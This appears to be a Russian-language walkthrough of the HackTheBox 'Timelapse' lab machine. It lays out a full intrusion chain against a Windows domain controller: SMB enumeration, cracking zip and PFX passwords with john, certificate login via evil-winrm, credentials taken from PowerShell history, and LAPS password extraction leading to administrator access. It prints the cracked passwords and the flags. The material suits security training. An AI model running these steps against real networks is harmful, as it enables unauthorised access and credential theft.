Обзор сервисов
IP-адрес машины 10.10.11.152. Взглянем на вывод nmap:
$ nmap -sC -sT -p1-65535 -Pn -oN 10.10.11.152 10.10.11.152
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 13:42 EDT
Nmap scan report for 10.10.11.152
Host is up (0.059s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
| tls-alpn:
|_ http/1.1
|_ssl-date: 2023-07-26T01:45:06+00:00; +8h00m00s from scanner time.
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
58200/tcp open unknown
Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-26T01:45:06
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 228.59 seconds
Занесем в /etc/hosts домен:
$ sudo nano /etc/hosts
10.10.11.152 timelapse.htb dc01.timelapse.htb
Samba
С помощью smbclient возможно посмотреть дополнительную информацию о том, какие сетевые диски подключены.
$ smbclient -N -L 10.10.11.152
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
К дискам ADMIN$ и C$ доступ получить не вышло, зато мы можем читать Shares.
$ smbclient -N \\\\10.10.11.152\\ADMIN$
tree connect failed: NT_STATUS_ACCESS_DENIED
$ smbclient -N \\\\10.10.11.152\\C$
tree connect failed: NT_STATUS_ACCESS_DENIED
$ smbclient -N \\\\10.10.11.152\\Shares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 2463125 blocks available
winrm_backup.zip в каталоге Dev.
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 2463125 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (10.9 KiloBytes/sec) (average 10.9 KiloBytes/sec)
В каталоге HelpDesk лежит дистрибутив LAPS для ротации паролей.
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
6367231 blocks of size 4096. 2463125 blocks available
ZIP-архив
Архив запаролен. Попробуем подобрать пароль с помощью брутфорса.
$ zip2john winrm_backup.zip > hash
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2023-07-25 14:01) 2.702g/s 9387Kp/s 9387Kc/s 9387KC/s suzyqzb..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Воспользуемся найденным паролем supremelegacy.
$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
inflating: legacyy_dev_auth.pfx
PFX-файл
Распакованный файл legacyy_dev_auth.pfx содержит в себе сертификаты и приватный ключ. Эта статья поможет распаковать файл, но нам требуется пароль.
$ openssl pkcs12 -info -in legacyy_dev_auth.pfx -nodes -nocerts
Enter Import Password:
Can't read Password
Попробуем снова воспользоваться брутфорсом.
$ pfx2john legacyy_dev_auth.pfx > hash_pfx
$ john hash_pfx --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:49 DONE (2023-07-25 14:07) 0.02040g/s 65953p/s 65953c/s 65953C/s thumper1990..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Дампнем приватный ключ, а следом сертификат, воспользовавшись паролем thuglegacy:
$ openssl pkcs12 -info -in legacyy_dev_auth.pfx -nodes -nocerts -out legacyy_dev_auth.key
Enter Import Password:
MAC: sha1, Iteration 2000
MAC length: 20, salt length: 20
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2000
PKCS7 Data
Certificate bag
$ openssl pkcs12 -info -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:
MAC: sha1, Iteration 2000
MAC length: 20, salt length: 20
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2000
PKCS7 Data
Certificate bag
WinRM
Попробуем подключиться с помощью evil-winrm, используя полученный приватный ключ и сертификат:
$ evil-winrm -i timelapse.htb -S -c legacyy_dev_auth.crt -k legacyy_dev_auth.key
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents>
Пользовательский флаг
Сразу можем забрать пользовательский флаг.
*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls
Directory: C:\Users\legacyy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/25/2023 7:25 AM 34 user.txt
*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address… … … . . : dead:beef::ac
IPv6 Address… … … . . : dead:beef::6de4:6869:a7ce:53e1
Link-local IPv6 Address … . . : fe80::6de4:6869:a7ce:53e1%13
IPv4 Address… … … . . : 10.10.11.152
Subnet Mask … … … . . : 255.255.254.0
Default Gateway … … … : fe80::250:56ff:feb9:935a%13
10.10.10.2
*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
8af4ec585761b0df90e7de96437b70a1
Повышение привилегий
Загрузим winPEAS:
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload winPEAS.bat
Info: Uploading /home/user/htb/timelapse/winPEAS.bat to C:\Users\legacyy\Documents\winPEAS.bat
Data: 48236 bytes of 48236 bytes copied
Info: Upload successful!
История powershell:
PS default transcript history
Checking PS history file
Volume in drive C has no label.
Volume Serial Number is 22CC-AE66
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 10,086,412,288 bytes free
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
Мы получаем креды учетной записи svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV. Снова воспользуемся evil-winrm для подключения:
$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Дальнейшее продвижение
Проверим, что умеет пользователь svc_deploy:
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/25/2023 7:40:55 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
Это пользователь оказывается в группе LAPS_Readers. Мы можем считать поле ms-mcs-AdmPwd (https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/laps).
$ git clone https://github.com/ztrhgf/LAPS.git
Cloning into 'LAPS'…
remote: Enumerating objects: 51, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 51 (delta 6), reused 4 (delta 0), pack-reused 37
Receiving objects: 100% (51/51), 504.03 KiB | 2.09 MiB/s, done.
Resolving deltas: 100% (19/19), done.
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload LAPS\AdmPwd.PS
Info: Uploading /home/user/htb/timelapse/LAPS/AdmPwd.PS to C:\Users\legacyy\Documents\AdmPwd.PS
Data: 53980 bytes of 53980 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> cd AdmPwd.PS
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> get-admpwdpassword -computername dc01 | select password
Password
--------
5r4]VTk[#)[4A)pQ{[0s9Jrh
Получили пароль пользователя administrator:5r4]VTk[#)[4A)pQ{[0s9Jrh.
В очередной раз воспользуемся evil-winrm для подключения:
$ evil-winrm -i 10.10.11.152 -u administrator -p '5r4]VTk[#)[4A)pQ{[0s9Jrh' -S
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Флаг суперпользователя
Обычно флаг на HackTheBox находится в каталоге администратора, но в этот раз он лежит по пути C:\Users\TRX\Desktop\root.txt.
*Evil-WinRM* PS C:\Users\TRX> cd Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> ls
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/25/2023 7:25 AM 34 root.txt
*Evil-WinRM* PS C:\Users\TRX\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address… … … . . : dead:beef::ac
IPv6 Address… … … . . : dead:beef::6de4:6869:a7ce:53e1
Link-local IPv6 Address … . . : fe80::6de4:6869:a7ce:53e1%13
IPv4 Address… … … . . : 10.10.11.152
Subnet Mask … … … . . : 255.255.254.0
Default Gateway … … … : fe80::250:56ff:feb9:935a%13
10.10.10.2
*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
6b862d432c76c25e4e999d167ddd63d9
